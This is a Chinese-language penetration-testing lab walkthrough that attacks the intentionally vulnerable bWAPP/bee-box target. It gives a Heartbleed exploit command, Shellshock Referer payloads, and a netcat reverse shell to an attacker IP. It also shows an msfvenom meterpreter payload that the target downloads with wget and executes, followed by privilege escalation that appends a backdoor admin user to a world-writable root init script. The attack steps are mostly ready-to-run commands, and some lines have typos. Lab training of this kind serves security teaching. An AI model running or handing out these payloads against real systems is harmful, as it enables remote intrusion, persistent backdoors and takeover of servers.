web渗透实验-平台漏洞利用

7.1 使用 Exploit-DB 利用 Heartbleed 漏洞

1. 使用 sslscan 检查靶机（蜜罐）上的 TCP 端口 8443，如下面的屏幕截图所示，

2.通过利用 Heartbleed 将从服务器中提取信息，然后继续在其应用中进行一些攻

击，登录 bWAPP（http://192.168.152.128/bWAPP/portal.php）以确保服务器内存中有一

些数据。

3.现在，要在 Exploit-DB 的本地副本中查找漏洞，请打开终端并键入 searchsploit

heartbleed 命令。 结果显示在此处：

4．将在列表中选择第一个漏洞。 先检查此漏洞的内容并分析如何使用它以及它

的作用，可以简单地使用 cat 命令来显示 Python 代码

cat /usr/share/exploitdb/exploits/multiple/remote/32764.py

5.根据漏洞利用中的说明，应该将服务器地址作为第一个参数运行，然后使用-p

选项输入要测试的端口。因此，攻击命令应该是

python2 /usr/share/exploitdb/exploits/multiple/remote/32764.py 192.168.152.131 -p 8443

7.2 通过利用 Shellshock 执行命令

1. 在下拉框中，选择 Shellshock 漏洞(CGI)，点击 Hack:

2. 幕后发生了什么，使用 Burp Suite 记录请求并重新加载页面。让看看代理的历史:

可以看到有一个 iframe 调用 shell 脚本:/cgi-bin/shellshock.sh，这可能是易受

Shellshock 漏洞影响的脚本。

3. 关注这个提示，并尝试攻击 shellshock.sh。首先需要配置 BurpSuite 来拦截服

务器响应。转到“代理”选项卡中的“选项”，并根选中带有文本拦截响应的复选框。

4. 现在，设置 BurpSuite 拦截并重新加载 shellshock.php。

5. 在Burp Suite中，单击Forward直到看到get 请求到

/bWAPP/cgi-bin/shellshock.sh。然后，将referer替换为(){:;};echo“Vulnerable:”

6. 再次单击 Forward，并再次在请求。然后需要从 shellshock.sh 中获取响应。

7. 现在，尝试() { :;}; echo "Vulnerable:" $(/bin/sh -c "/sbin/ifconfig")命令。

8. 在渗透测试中，能够在服务器上远程执行命令是一个巨大的优势，下一个自然步骤是获得远程 shell，这意味着可以通过直接连接发送更详细的命令。在 Kali Linux中打开一个终端，用下面的命令建立监听网络端口： nc -vlp 12345。

9. 现在转到 Burp Suite 代理的历史记录，选择对 shellshock.sh 的任何请求。右键

单击它，并将其发送到中 repeater。

10. 进入 repeater 后，将 referer 的值改为:

() { :;}; echo "Vulnerable:" $(/bin/sh -c "nc -e/bin/bash 192.168.152.130 12345")

11.检查终端，可以看到连接已经建立，发出一些命令来检查是否有远

程shell：

whomi

www-data

uname -a

ifconfig

7.3利用metasploit创建并反弹shell

1. 首先用 msfvenom 生成一个反弹 shell 的程序，将返回的连接地址修改为攻击

机的 ip 地址。在 kali 中打开终端，输入：

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.152.130 LPORT=4443 -f elf > cute_dolphin.bin

这将创建一个名为 cute_dolphin.bin 的文件，这是一个 linux 的反向连接 shell，

它会使靶机连接到监听的端口上，而不是去连接靶机的端口。

2. 接下来需要创建侦听。打开 msfconsole，然后输入以下命令：

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set lhost 192.168.152.130

set lport 4443

show options

run

可以看到，payload，lhost，lport 都是创建 bin 文件的参数，这是指程序要连接

的 ip 和端口。

3. 一切准备就绪，开始攻击的流程。在根目录启动 apache 服务：

service apache2 start

4．知道 bee-box 有一个远程命令执行的漏洞，来利用一下它：

() { :;}; echo "Vulnerable:" $(/bin/sh -c "/usr/bin/wget http://192.168.152.130/cute_dolphin.bin -O /tmp/cute_dolphin.bin; chmod +x /tmp/cute_dolphin.bin; ls -l /tmp/cute_dolphin.bin")

5.接着再次利用命令执行运行该恶意文件：

() { :;}; echo "Vulnerable:"$("/tmp/cute_dolphin.bin")

如果一切正常，metasploit 侦听器就会收到一个连接请求：

6.成功反弹 shell 后，可以输入 help 查看 meterpreter 的功能，并执行相应命令：

Sysinfo

Shell

Whoami

ifconfig

7.4 Linux上的权限提升！~

1. KaliLinux 包含一个名为 unix-privesc-check 的工具， 它会检查系统是否存在

可能允许升级权限的配置漏洞。

从 meterpretershell，可以使用 upload 命令将其上传到服务器。

upload /usr/bin/unix-privesc-check /tmp/

~

1. 上传文件后，打开系统 shell（使用 meterpreter 中的 shell 命令）并使用

sh /tmp/unix-privesc-check standard 运行脚本。

3. 该脚本将显示一长串结果，但对开头显示 WARNING 的那个感兴趣。 在下面

的屏幕截图中，可以看到有一个脚本（/etc/init.d/bwapp_movie_search）在启动时由 root 运行，每个人都可以写入它（设置了 World write）：

4. 将使用该文件使 root 用户在启动时执行命令。 将创建一个具有管理权限的用

户，以便可以通过 SSH 连接随时到服务器。为此，需要检查系统中存在的组，以便

了解哪些组具有特权访问权限。

在系统 shell 中，运行 cat /etc/group | sort -u  命令。

5. 由于没有完整的 shell，无法打开文本编辑器将命令添加到目标文件中，因此

需要使用 echo 将它们逐行附加到文件中：

echo "/use/sbin/useradd hacker -m -s /bin/bash -g admin -G root,adm" >> /etc/init.d/bwapp_movie_search

~~

6.由于此服务器是测试实验室的一部分，可以重新启动它。在实际情况中，攻击者可能会尝试攻击以使服务器重新启动，或者 DoS 会强制管理员重新启动它。

7. 重启bee-box靶机，在 Kali Linux 中使用 ssh 登录 sshhacker@192.168.56.12，

由于版本的原因，已经不支持dsa算法，所以需要添加参数

ssh -o HostKeyAlgorithms=+ssh-dss hacker@192.168.152.131

然后使用在步骤 5 中设置的密码。如果询问是否接受主机证书，请键入 yes 并按 Enter

键。

9. 如果一切正常，您将能够登录。以下屏幕截图显示用户具有对所有命令的 root

访问权限，因为它们属于组 admin（sudo -l）并且可以模拟 root 用户（sudo su）